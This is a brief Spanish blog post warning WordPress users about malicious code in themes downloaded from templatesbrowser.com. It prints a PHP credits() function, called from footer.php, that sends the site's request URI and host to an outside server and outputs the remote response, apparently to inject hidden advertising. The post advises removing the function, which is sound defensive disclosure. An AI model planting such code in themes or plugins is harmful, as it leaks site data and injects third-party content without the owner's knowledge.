Código Malicioso en themes para Wordpress
Leyendo en el blog de Andres Nieto me doy cuenta de este nuevo intento para perjudicar a los usuarios de Wordpress, en este caso se trata de inserción de código malicioso en algunos themes descargados de sitios como templatesbrowser.com.
El código lo podemos ver en el archivo functions.php (dentro de nuestro theme por supuesto), lo que podemos ver es algo como lo siguiente:
[php]
function credits()
{
$url = "http://1.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>[/php]
Esta función la podemos ver incluida en el fichero footer.php:
Se trata de una conexión mediante sockets a la página de templatebrowser.com que nos devuelve los créditos del theme, al parecer se está utilizando igualmente esta función para meterle publicidad oculta al theme.
La solución:
Pues eliminar la función credits() del archivo functions.php y del footer.php.
No Comments, Comment or Ping
Dejar un comentario en “Código Malicioso en themes para Wordpress”